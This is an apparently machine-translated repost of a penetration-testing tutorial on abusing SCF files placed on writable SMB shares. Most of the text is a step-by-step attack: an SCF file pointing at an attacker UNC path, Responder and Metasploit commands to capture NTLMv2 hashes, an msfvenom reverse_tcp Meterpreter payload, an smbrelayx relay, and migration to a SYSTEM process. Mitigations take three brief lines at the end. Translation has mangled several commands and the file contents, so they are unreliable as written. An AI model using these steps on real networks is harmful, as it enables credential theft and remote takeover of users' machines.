Shulou(Shulou.com)05/31 Report--

How to use SCF files to build network penetration, in view of this problem, this article introduces the corresponding analysis and solutions in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

SMB is a network protocol widely used for file sharing purposes in enterprise organizations. In internal penetration tests, it is not uncommon to find shared files that contain sensitive information such as plaintext passwords and database connection strings. However, even if a file share does not contain any data that can be used to connect to other systems, but the unauthenticated user configuration has write access to the file, in this case, the attacker can also obtain the password hash or Meterpreter shell of the domain user.

Collect hash

SCF (Shell command file) files can be used to perform a limited set of operations, such as displaying the Windows desktop or opening Windows Explorer, which is nothing new. However, a SCF file can be used to access a specific UNC path, allowing penetration testers to build attacks. The following code can be placed in a text file and then needs to be populated into the network share.

[Shell] Command=2IconFile=\\ X.X.X.X\ share\ Pentestlab.ico [Taskbar] Command=ToggleDesktop

Contents of the SCF file

Save the pentestlab.txt file as a SCF file and make the file execute when the user browses the file. Adding the @ symbol before the file name places pentestlab.scf at the top of the list of shared drive files.

SCF file

Responder needs to execute with the following parameters to capture the hash value of the user browsing the share.

Responder-wrf-- lm-v-I eth0

Parameters of Responder-SCF

When the user browses the share, a network connection is automatically established from the system to the UNC path contained in the SCF file. Windows will attempt to authenticate the share with a user name and password. During authentication, a random 8-byte challenge key is sent from the server to the client, and the hashed NTLM / LANMAN password is encrypted using the challenge key again. Responder will capture the NTLMv2 hash.

Responder-NTLMv2 hash crawled through SCF

In addition to Responder,Metasploit Framework, there is also a module that can be used to capture challenge-response password hashes from SMB clients.

Auxiliary/server/capture/smb

Metasploit-the module that captures SMB

As before, when a user browses the same share, his password hash will be captured by Metasploit.

Metasploit-capture NTLMv2

If the password policy within the company is low enough, it may only take days or weeks for an attacker to crack the captured password hash.

Meterpreter Shell

The main advantage of the above technique is that it does not require any interaction with the user and automatically forces the user to connect to the share, in which there is no negotiation process for NTLMv2 hashing. Therefore, this technology can also be combined with a SMB relay, which provides a payload that can retrieve the Meterpreter Shell from each user who accesses the share.

MSFVenom can be used to generate a payload that will be executed on the target:

Msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555-f exe > pentestlab.exe

MSFVenom-payload generated for SMB relay

Coresecurity has released a Python script called Impacket that can perform various attacks on Windows protocols such as SMB. Use the python script smbrelayx to set up a relay attack and provide a payload when the target host tries to connect to the SMB server. This will be performed automatically because the SCF file will force each user to connect to a share that does not exist with their own credentials.

. / smbrelayx.py-h Target-IP-e. / pentestlab.exe

Impacket-SMB relay server

The Metasploit framework receives connections when it needs to be used and pentestlab.exe is performed on the target.

Exploit/multi/handler

The module needs to be configured with the same parameters as the generated payload.

Set payload windows/meterpreter/reverse_tcpset LHOST 192.168.1.171set LPORT 5555exploit

Metasploit-multiprocessor module

When the user browses the share, the SMB server receives the connection, authenticates with his system using a username and password hash, and executes the payload as a writable share.

Impacket-SMB relay attack

Meterpreter will receive a session. But to avoid losing connections, it is necessary to migrate to a more stable process.

Meterpreter-lists the running processes

You need to use the migration command and process identity.

Meterpreter-process migration

In this example, process 1600 corresponds to a svchost.exe process running with SYSTEM privileges.

Meterpreter-list of migration processes

Running getuid from the Meterpreter console will get the current UID, which is now SYSTEM.

Meterpreter-retrieve the current UID

The Metasploit framework can also implement the same attack.

Exploit/windows/smb/smb_relayset payload windows/meterpreter/reverse_tcpset LHOST 192.168.1.171exploit

Metasploit-SMB relay module

The SMB server will establish a connection to authenticate the target by using a username and password hash, pass a payload on a writable share, execute the payload as a service with user rights, perform cleanup, and return a Meterpreter session.

Metasploit-SMB relay attack

You can use the sessions command to interact with an existing session.

Metasploit-SMB relay session

This technique takes advantage of what is common in all networks, such as sharing, to retrieve password hashes and get meterpreter shell. The only requirement is that the user needs to browse the share that contains malicious SCF files. However, these attacks can be prevented by doing the following:

Using Kerberos authentication and SMB signing

Unauthenticated users are not allowed to have write permissions in the file share

Be sure to use NTLMv2 password hash instead of LanMan

This is the answer to the question about how to use SCF files to build network penetration. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.